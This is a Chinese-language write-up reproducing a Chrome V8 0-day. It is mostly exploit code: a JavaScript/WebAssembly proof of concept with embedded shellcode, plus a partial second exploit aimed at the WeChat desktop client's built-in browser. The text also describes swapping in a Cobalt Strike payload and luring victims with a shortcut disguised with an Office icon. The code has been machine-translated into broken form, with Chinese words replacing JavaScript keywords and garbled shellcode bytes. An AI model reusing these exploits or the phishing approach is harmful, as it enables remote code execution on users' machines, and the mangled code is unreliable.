
Chrome 0Day 复现与思考


Chrome 0Day 复现与思考​

1 漏洞复现​

在HW期间，Chrome 0day被公开，本文对其进行复现。
弹出记事本的POC：
脚本
功能gc(){
for(var i=0; i0x80000; ++ i){
var a=new ArrayBuffer();
}
}
LET shellCode=[0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x00,0x41,0x41,0x51,0x41,0x41,0x50,0x50,0x52,0x51,0x51,0x51,0x51,0x51,0x51,0x51,0x51,0x51,
0x56,0x48,0x31,0xd2,0x65,0x48,0x48,0x8b,0x52,0x60,0x48,0x48,0x8b,0x52,0x18,0x48,0x48,0x48,0x8b,0x8b,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x18b
0x20,0x48,0x8b,0x72,0x50,0x48,0x48,0x0f,0xB7,0x4a,0x4a,0x4a,0x4d,0x4d,0x31,0xc9,0x48,0x48,0x31,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc9
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x2c,0x20,0x41,0xc1,0xc1,0xc9,0x0d,0x41,0x41,0x01,0xc1,0xc1,0xe2,0xe2,0xed,0xed,0xed,0xed,0xed,0xed,0xe
0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x20,0x8b,0x42,0x3c,0x48,0x48,0x01,0xd0,0x8b,0x8b,0x80,0x80,0x88,0x88,0x88,0x88,0x88,0x88,0x80
0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x48,0x01,0xd0,0x50,0x50,0x8b,0x48,0x18,0x18,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x48
0x8B,0x40,0x20,0x49,0x01,0xD0,0xE3,0x56,0x48,0xFF,0xC9,0x41,0x8B,0x34,0x88,0x48,
0x01,0xD6,0x4D,0x31,0xC9,0x48,0x31,0xC0,0xAC,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,
0x38,0xe0,0x75,0xf1,0x4c,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0x39,0xd1,0x75,0xd8,0xd8,0x58,0x58,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0xd1
0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x41,0x8b,0x0c,0x48,0x48,0x44,0x44,0x8b,0x40
0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x48,0x01,0xd0,0x41,0x41,0x58,0x41,0x58,0x58,0x5e,0x5E,0x59,0x59,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5A,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5
0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x48,0x83,0xec,0x20,0x41,0x41,0x52,0x52,0xff,0xe0,0x58,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41
0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0x57,0xff,0xff,0xff,0xff,0x5d,0x48,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x48,0x48,0x8d,0x8d,0x01,0x01,0x01,0x01,0x00,0x00,0x41,0x41,0xba,0xba,0x31,0x31,0x8b,0x8b,0x8b,
0x6f,0x87,0xff,0xD5,0xBb,0xf0,0xb5,0xa2,0x56,0x41,0x41,0xba,0xa6,0x95,0x95,0xbd,0x9d,0x9d,0x9d,0xff,0xff,0xff,0xff,
0xd5,0x48,0x83,0xc4,0x28,0x28,0x3c,0x06,0x7c,0x0a,0x0a,0x80,0xfb,0xe0,0x75,0x75,0x05,0x05,0xBB,0xbb,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0xBB
0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xda,0xd5,0xd5,0x6e,0x6e,0x6f,0x74,0x65,0x65,0x70,0x70,0x70,0x70,0x70,0x74
0x61,0x64,0x2e,0x65,0x78,0x65,0x00];
var wasmcode=new uint8array([[0,97,115,109,1,0,0,0,0,0,0,0,1,133,128,128,128,128,0,0,1,1,96,0,11,127,127,3,130,130,130,128,128,128,128,128,128,128,128,0 128,128,0,1,0,1,6,6,128,128,128,128,128,0,0,0,7,7,145,145,128,128,128,21 128,2,2,6,6,6,109,101,101,101,111,114,114,121,214,121,2,2,2,0 11]);
var wasmmodule=new webAssembly.module(wasmcode);
var wasminstance=new webAssembly.instance(wasmmodule);
var main=wasminstance.exports.main;
var bf=new ArrayBuffer(8);
var bfview=new Dataview(bf);
功能流(F){
bfview.setfloat64(0,f,true);
返回(bfview.getuint32(0,true));
}
功能FHI(F){
bfview.setfloat64(0,f,true);
返回(bfview.getuint32(4,true))
}
功能i2f(low,hi){
bfview.setuint32(0,low,true);
bfview.setuint32(4,hi,true);
返回bfview.getFloat64(0,true);
}
功能f2big(f){
bfview.setfloat64(0,f,true);
返回bfview.getBiguint64(0,true);
}
功能big2f(b){
bfview.setbiguint64(0,b,true);
返回bfview.getFloat64(0,true);
}
类LeakarayBuffer扩展了ArrayBuffer {
构造函数(size){
超级(大小);
this.slot=0xb33f;
}
}
功能foo(a){
令x=-1;
if(a)x=0xffffff;
var arr=new Array(Math.sign(0 -Math.max(0,x,-1)));
arr.shift();
令local_arr=array(2);
local_arr [0]=5.1; //4014666666666666
令buff=new LeakarRayBuffer(0x1000); //bytelength IDX=8
arr [0]=0x1122;
返回[arr,local_arr,buff];
}
for(var i=0; i0x10000; ++ i)
foo(false);
gc(); gc();
[corprput_arr,rwarr,dround_buff]=foo(true);
Corrput_arr [12]=0x22444;
删除Corrput_arr;
功能挫折store(hi,low){
rwarr [4]=i2f(flow(rwarr [4]),hi);
rwarr [5]=i2f(low,fhi(rwarr [5]));
}
函数leak objlow(o){
rustal_buff.slot=o;
返回(flow(rwarr [9]) - 1);
}
令dround_view=new Dataview(rupts_buff);
令ROUTTEN_BUFFER_PTR_LOW=LeakObjlow(Robs_Buff);
令IDX0ADDR=ROUTTEN_BUFFER_PTR_LOW -0x10;
令BASEADDR=(ROUTTER_BUFFER_PTR_LOW0xFFFF0000) - ((rustaD_buffer_ptr_low0xffff0000)%0x40000) +0x40000;
令delta=baseaddr +0x1c -idx0Addr;
if(((delta%8)==0){
令baseIdx=delta/8;
this.base=flow(rwarr [baseIdx]);
} 别的{
令baseIdx=((delta-(delta%8))/8);
this.base=fhi(rwarr [baseIdx]);
}
令WasminsAddr=LeakObjlow(Wasminstance);
setbackingstore(wasminsaddr,this.base);
令code_entry=rust_view.getfloat64(13 * 8,true);
setbackingstore(flow(code_entry),fhi(code_entry));
for(让i=0; i shellCode.length; i ++){
rustas_view.setuint8(i,shellCode );
}
主要的();
/脚本
先决条件是关闭Chrome的沙盒模式:
20210415110756.png-water_print

执行poc.html:
20210415110926.png-water_print

快捷方式钓鱼,只需更改办公室图标:
20210415111158.png-water_print

在线CS:
生成64位有效载荷,然后将格式转换为:
20210415113232.png-water_print

执行POC并成功启动:
20210415113309.png-water_print

2 思考​

Windows 微信客户端内置的 Chrome 浏览器默认关闭沙盒模式，但它是 32 位的。如果有 32 位的有效载荷，就可以拿下该客户端。

3 后续补充​

Windows 微信客户端有效载荷：
enable_log=true;
in_worker=true;
//输入您的shellCode
var shellCode=[0x00,0x00];
功能打印(数据){
}
var not_optimised_out=0;
var target_function=(function(value){
if(value==0xdecaf0){
not_optimised_out +=1;
}
not_optimised_out +=1;
not_optimised_out |=0xff;
not_optimised_out *=12;
});
for(var i=0; i0x10000; ++ i){
target_function(i);
}
var g_array;
var tderivedncount=17 * 87481-8;
var tderivedndepth=19 * 19;
功能CB(flag){
如果(flag==true){
返回;
}
g_array=new Array(0);
g_array [0]=0x1dbabe * 2;
返回'c01db33f';
}
功能gc(){
for(var i=0; i0x10000; ++ i){
new String();
}
}
函数oobaccess(){
var this_=this;
this.buffer=null;
this.buffer_view=null;
this.page_buffer=null;
this.page_view=null;
this.prevent_opt=[];
var kslotoffset=0x1f;
var kbackingstoreoffset=0xf;
类LeakarayBuffer扩展了ArrayBuffer {
constructor(){
超级(0x1000);
this.slot=this;
}
}
this.page_buffer=new LeakArarayBuffer();
this.page_view=new Dataview(this.page_buffer);
new Regexp({ToString: function(){return'A'}});
CB(true);
class derivedbase扩展了regexp {
constructor(){
//var array=null;
极好的(
//此时,jsregexp的4字节分配this`对象
//刚刚发生。
{
Tostring: CB
},'g'
//现在称为运行时jsregexp构造函数,损坏
//jsarray。
);
//此分配现在将直接遵循固定阶层分配
//为`this.data'制作,这是`array.elements'指向的位置。
this_.buffer=new ArrayBuffer(0x80);
g_array [8]=this_.page_buffer;
}
}
//尝试{
var derived_n=eval(`(函数derived_n(i){
如果(i==0){
返回派生键;
}
类派生的类扩展了derived_n(i-1){
constructor(){
极好的();
返回;
$ {'this.a=0;'。重复(tderivedncount)}
}
}
返回派生;
})`);
gc();
new(derived_n(tderivedndepth))();
this.buffer_view=new Dataview(this.buffer);
this.leakptr=function(obj){
this.page_buffer.slot=obj;
返回this.buffer_view.getUint32(kslotoffset,true, this.prevent_opt);
}
this.setptr=function(addr){
this.buffer_view.setuint32(kbackingstoreoffset,addr,true, this.prevent_opt);
}
this.read32=function(addr){
this.setptr(addr);
返回this.page_view.getUint32(0,true, this.prevent_opt);
}
 